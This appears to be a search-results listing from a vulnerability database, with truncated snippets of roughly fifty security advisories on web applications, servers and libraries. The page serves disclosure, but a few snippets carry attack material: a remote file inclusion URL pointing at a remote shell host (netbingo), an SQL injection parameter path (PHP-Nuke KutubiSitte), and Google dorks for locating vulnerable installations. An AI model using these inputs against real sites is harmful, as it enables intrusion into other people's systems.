47153 matches found
Apache security vulnerabilities
moddav malformed MERGE request crash, modrewrite log manipulation...
[Foreground Security 2013-001]: Joomla AICONTACTSAFE 2.0.19 Extension Cross-Site Scripting (XSS) vulnerability
Joomla AICONTACTSAFE 2.0.19 Extension Cross-Site Scripting XSS vulnerability ============================================================ FOREGROUND SECURITY, SECURITY ADVISORY 2013-001 - Original release date: July 10, 2013 - Discovered by: Adam Willard Software Security Analyst at Foreground...
CVE-2013-2155: Apache Santuario C++ denial of service vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 CVE-2013-2155: Apache Santuario XML Security for C++ contains denial of service and hash length bypass issues while processing HMAC signatures Severity: Critical Vendor: The Apache Software Foundation Versions Affected: Apache Santuario XML Security...
VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 VML Remote Integer Overflow (MS13-037 / Pwn2Own)
VUPEN Security Research - Microsoft Internet Explorer 10-9-8-7-6 VML Remote Integer Overflow MS13-037 / Pwn2Own Website : http://www.vupen.com Twitter : http://twitter.com/vupen I. BACKGROUND --------------------- "Microsoft Internet Explorer is a web browser developed by Microsoft and included a...
Cisco Video Surveillance Operations Manager Multiple vulnerabilities
Exploit Title:Cisco Video Surveillance Operations Manager Multiple vulnerabilities Google Dork: intitle:"Video Surveillance Operations Manager Login" Date: 22 Feb 2013 reported to the vendor Exploit Author: Bassem | bassem.co Vendor Homepage: www.cisco.com Version: Version 6.3.2 Tested on: Versio...
Multiple Vulnerabilities in Linksys WAG200G
Device Name: Linksys WAG200G Vendor: Linksys/Cisco ============ Device Description: ============ The WAG200G is a Linksys Wireless-G ADSL Home Gateway which has a high-speed ADSL2+ modem that gives you a fast connection to the Internet. Source:...
[SE-2012-01] Details of issues fixed by Feb 2013 Java SE CPU
Hello All, Below, we are providing you with technical details regarding security issues reported by us to Oracle and addressed by the company in a recent Feb 2013 Java SE CPU 1. Issue 29 This issue allows for the creation of arbitrary Proxy objects for interfaces defined in restricted packages...
Elcom CMS - Community Manager Insecure File Upload Vulnerability - Security Advisory - SOS-12-008
Elcom CMS - Community Manager Insecure File Upload Vulnerability - Security Advisory - SOS-12-008 Release Date. 24-Aug-2012 Last Update. - Vendor Notification Date. 28-Oct-2011 Product. Elcom CMS - Community Manager Platform. ASP.NET Affected versions. Elcom Community Manager version 7.4.10 and...
ZDI-12-022 : Total Defense Suite UNC Management Console ExportReport SQL Injection Vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-022 : Total Defense Suite UNC Management Console ExportReport SQL Injection Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-022 February 8, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: Tota...
n.runs-SA-2011.004 - web programming languages and platforms - DoS through hash table
n.runs AG http://www.nruns.com/ securityatnruns.com n.runs-SA-2011.004 28-Dec-2011 Vendors: PHP, http://www.php.net Oracle, http://www.oracle.com Microsoft, http://www.microsoft.com Python, http://www.python.org Ruby, http://www.ruby.org Google, http://www.google.com Affected Products: PHP 4 and ...
BF, XSS, IAA и CSRF уязвимости в poMMo
Здравствуйте 3APA3A! Сообщаю вам о найденных мною Brute Force, Cross-Site Scripting, Insufficient Anti-automation и Cross-Site Request Forgery уязвимостях в poMMo. Brute Force WASC-11: http://site/pommo/index.php XSS WASC-08:...
PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Vulnerability
------------------------------------------------------------------- PmWiki = 2.2.34 pagelist Remote PHP Code Injection Vulnerability ------------------------------------------------------------------- author...............: Egidio Romano aka EgiX mail.................: n0b0d13satgmaildotcom...
[USN-1137-1] Eucalyptus vulnerability
========================================================================== Ubuntu Security Notice USN-1137-1 May 26, 2011 eucalyptus, rampart vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its...
[DCA-2011-0006] Hiawatha 7.4 - Denial-of-Service
Discussion - DcLabs Security Research Group advises about the following vulnerabilityies: Software - Hiawatha WebServer 7.4 Vendor Product Description - Hiawatha is an open source webserver with a focus on security. I started Hiawatha in January 2002. Before that time, I had used several...
Piwigo SQL Injection Vulnerability - Security Advisory - SOS-09-007
Piwigo SQL Injection Vulnerability - Security Advisory - SOS-09-007 Release Date. 17-Aug-2009 Last Update. - Vendor Notification Date. 15-Jun-2009 Product. Piwigo Platform. Independent Affected versions. 2.0.0 verified, possibly others Severity Rating. Medium Impact. Manipulation of data Attack...
SASPCMS Multiple Vulnerabilities
www.BugReport.ir AmnPardaz Security Research Team Title: SASPCMS Multiple Vulnerabilities Vendor: http://www.lgasoft.com Vulnerable Version: 0.9 prior versions also may be affected Exploitation: Remote with browser Fix: N/A - Description: SASPCMS is an ASP Content Management System . SASPCMS witc...
Joomla Component mydyngallery
Joomla Component mydyngallery AUTHOR : Sina Yazdanmehr R3d.W0rm Discovered by : Sina Yazdanmehr R3d.W0rm Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash - R3d.w0rm Sina Yazdanmehr - Hadi Kiamarsi Download : http://mydyngallery.mon-cottenchy.fr DORK : inurl:option=commydyngallery Bug...
A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Louhi Networks Information Security Research Security Advisory Advisory: A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability Release Date: 2008/10/31 Last Modified: 2008/10/28 Authors: Jussi Vuokko, CISSP [email protected] Henri Lindberg...
Mozilla Foundation Security Advisory 2008-14
Mozilla Foundation Security Advisory 2008-14 Title: JavaScript privilege escalation and arbitrary code execution Impact: Critical Announced: March 25, 2008 Reporter: mozbugra4, Boris Zbarsky, Johnny Stenback Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 2.0.0.13 Thunderbird 2.0.0.13...
PHP-Nuke KutubiSitte "kid" SQL Injection
RBT-4 Crew rbt-4.net PHP-Nuke KutubiSitte "kid" SQL Injection http://www.rbt-4.net/forum/viewthread.php?forumid=51&threadid=3058 AUTHOR : Lovebug modules.php?name=KutubiSitte&hop=hadisgoster&kid= Exploit :...
PHPSlideShow XSS Update
Vendor Site: http://www.zinkwazi.com/wp/scripts/ Version affected: 0.9.9.2 URL:http://www.example.com/scripts/demo/phpslideshow.php?directory=photos BID ref: 26576 By Jose Luis Gуngora Fernбndez PHPSlideShow is also susceptible the following inputs:...
netbingo v 2000 >> RFI
name & version :netbingo & 2000 vendor: http://www.proactech.com by : www.hackerz.ir userz,s3rv3rhack3r,saeidonlylinux,farzad exploit :http://victim/bingoserver.php3?responsedir=http://shell...
DNS birthday attacks
DNS uses 2-bytes message identificator to prevent spoofing attack. The problem is if few same requests came in same time they are forwarded with different IDs from same UDP port. It increases chances to spoof reply so called birthdey effect: probability that among 60 randomely choosen persons the...
Tosmo Mambo <= 4.0.12 (absolute_path) Multiple RFI Vulnerabilities
================================================== Joomla/Mambo Component Taskhopper 1.1 /inc/ mosConfigabsolutepath RFI ================================================== Found By : Cold z3ro , [email protected] ================================================== Homepage: www.Hack-Teach.com...
Multiple Orcale security vulnerabilities.... again...
Released security update fixes 17 security vulnerabilities for Oracle Database, 9 vulnerabilities in Oracle HTTP Server, 12 security vulnerabilities for Oracle Application Server, 7 vulnerabilities for Oracle E-Business Suite, 6 security bugs in Oracle Enterprise Manager, 3 bugs in Oracle...
LunarPoll (PollDir) Remote File Include Vulnerabilities
------------------------------------------------------------------------------------------------------------------- AYYILDIZ.ORG PreSents... Script:LunarPoll Script Download: dexxaboy.com/scripts/lunarpoll/download/ Contact: ilker Kandemir ilkerkandemiratmynet.com Code:...
SazCart <= 1.5 (cart.php) Remote File Include Vulnerability
sazcart v1.5 cart.php Remote File include ---Hitamputih crew--- Bug Found By : IbnuSina vendor : http://sazcart.com/site Risk : High Greetz : Solpot,permenhack,barbarosa,cah|gemblunkz,fungmen,setiawan,irvian,meteoroid and all member hitamputih crew community www.kaipank.org/forum especially thx t...
evoBB <= v0.3 (path) Remote File Inclusion Exploit
============================================================================================== evoBB = v0.3 path Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...
Signkorn Guestbook <= v1.3 (dir_path) Remote File Inclusion Exploit
============================================================================================== Signkorn Guestbook = v1.3 dirpath Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...
Secunia Research: IceWarp Web Mail Two File Inclusion Vulnerabilities
====================================================================== Secunia Research 17/07/2006 - IceWarp Web Mail Two File Inclusion Vulnerabilities - ====================================================================== Table of Contents Affected...
PHP5 Globals Vulnerability: with ?GLOBALS[foobar] you can set the value of the un-initialized $foobar variable.
PHP5 Globals Vulnerability: with ?GLOBALSfoobar you can set the value of the un-initialized $foobar variable. PHP5 Globals Vulnerability Name PHP5 Globals Vulnerability Systems Affected PHP5 verified on 5.1.1 and 5.1.2 Severity Critical Vendor www.php.net Advisory...
[SA15658] Ovidentia FX "babInstallPath" File Inclusion Vulnerability
---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secuniavacancies/...
Sun Java System Web Proxy Server buffer overflow
No description provided...
Les Visiteurs v2.0.1 code injection vulnerability
Les Visiteurs is a great statistics script written in php. It gives you some graphicals informations on visitors of your website. This script was distributed by phpinfo.net but is no more maintained since a year. --------- In this version severals unprotected includes can be found in files: -...
Security Bulletin (MS00-081)
Microsoft Security Bulletin MS00-081 - -------------------------------------- Patch Available for New Variant of "VM File Reading" Vulnerability Originally posted: October 25, 2000 Summary ======= Microsoft has released a patch that eliminates a security vulnerability in the Microsoftr virtual...
[ MDVSA-2015:228 ] nodejs
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2015:228 http://www.mandriva.com/en/support/security/ Package : nodejs Date : May 6, 2015 Affected: Business Server 2.0 Problem Description: Updated nodejs package fixes security vulnerability: It was found that...
[ MDVSA-2015:226 ] fcgi
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2015:226 http://www.mandriva.com/en/support/security/ Package : fcgi Date : May 4, 2015 Affected: Business Server 1.0 Problem Description: Updated fcgi packages fix security vulnerability: FCGI does not perform...
articleFR CMS 3.0.5 - Arbitrary File Upload
Vulnerability title: articleFR CMS 3.0.5 - Arbitrary File Upload Product: articleFR CMS Vendor: http://freereprintables.com Affected version: version 3.0.5 Fixed version: N/A Author: Tran Dinh Tien [email protected] & ITAS Team www.itas.vn ::DESCRITION:: - Vulnerabilities related to the upload ...
[SYSS-2014-011] FancyFon FAMOC - Cross-Site Scripting
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2014-011 Products: FAMOC Vendor: FancyFon Affected Versions: 3.16.5 Tested Versions: 3.16.5 Vulnerability Type: Cross-Site Scripting CWE-79 Risk Level: Medium Solution Status: Fixed Vendor Notification: 2014-12-19 Solution Date:...
[USN-2459-1] OpenSSL vulnerabilities
========================================================================== Ubuntu Security Notice USN-2459-1 January 12, 2015 openssl vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...
Mobilis MobiConnect 3G ZDServer 1.x - Privilege Escalation Vulnerability
Document Title: =============== Mobilis MobiConnect 3G ZDServer 1.x - Privilege Escalation Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1385 Release Date: ============= 2014-12-19 Vulnerability Laboratory ID VL-ID:...
FreeBSD Security Advisory FreeBSD-SA-14:09.openssl [REVISED]
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= FreeBSD-SA-14:09.openssl Security Advisory The FreeBSD Project Topic: OpenSSL use-after-free vulnerability Category: contrib Module: openssl Announced: 2014-04-30 Affects:...
EMC Data Protection Advisor DPA Illuminator EJBInvokerServlet Remote Code Execution
EMC Data Protection Advisor DPA Illuminator EJBInvokerServlet Remote Code Execution tested against: Microsoft Windows Server 2008 r2 sp1 EMC Data Protection Advisor 5.8 sp5 vulnerability: the "DPA Illuminator" service DPAIlluminator.exe listening on public port 8090 tcp/http and 8453 tcp/https is...
[CVE-2013-5702] Watchguard Server Center v11.7.4 Multiple Non-Persistent Cross-Site Scripting Vulnerabilities
Watchguard Server Center v11.7.4 Multiple Non-Persistent Cross-Site Scripting Vulnerabilities RCE Security Advisory http://www.rcesecurity.com 1. ADVISORY INFORMATION ----------------------- Product: Watchguard Server Center Vendor URL: www.watchguard.com Type: Cross-Site Scripting CWE-79 Date...
[Full-disclosure] Magnolia CMS multiple access control vulnerabilities
Subject: ====== Multiple access control vulnerabilities in Magnolia CMS, Community and Enterprise editions CVE ID: ====== CVE-2013-4621 Summary: ======== A non-admin user such as default users eric / peter can access and execute multiple administrative functionalities of the CMS by accessing...
nginx buffer overflow
Buffer overflow on proxypass upstream HTTP server response processing. Buffer overflow on chunked response parsing...
APPLE-SA-2013-03-04-1 Java for OS X 2013-002 and Mac OS X v10.6 Update 14
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2013-03-04-1 Java for OS X 2013-002 and Mac OS X v10.6 Update 14 Java for OS X 2013-002 and Mac OS X v10.6 Update 14 are now available and address the following: Java Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 o...
SQLi found in Kodak Insite
Hello ... While investigating a recent installation of Kodak's Insite Creative Workflow System for my current employer, an SQL Injection vulnerability was discovered in its "Forgot Your Password?" page. An example of this application can be seen on the Kodak site...
ESA-2012-057: EMC Smarts Network Configuration Manager Multiple Vulnerabilities
ESA-2012-057.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2012-057: EMC Smarts Network Configuration Manager Multiple Vulnerabilities EMC Identifier: ESA-2012-057 CVE Identifier: CVE-2012-4614 CVE Identifier: CVE-2012-4615 Severity Rating: CVSS v2 Base Score: See below for individual...
Security Advisory in LedgerSMBv 1.3.20 and below: Denial of Service vulnerability
A security oversight has been discovered in LedgerSMB 1.3 which could allow a malicious user to cause a denial of service against LedgerSMB or otherwise affect the way in which certain forms of data would get entered. In most cases we do not believe this to be particularly severe in the absence o...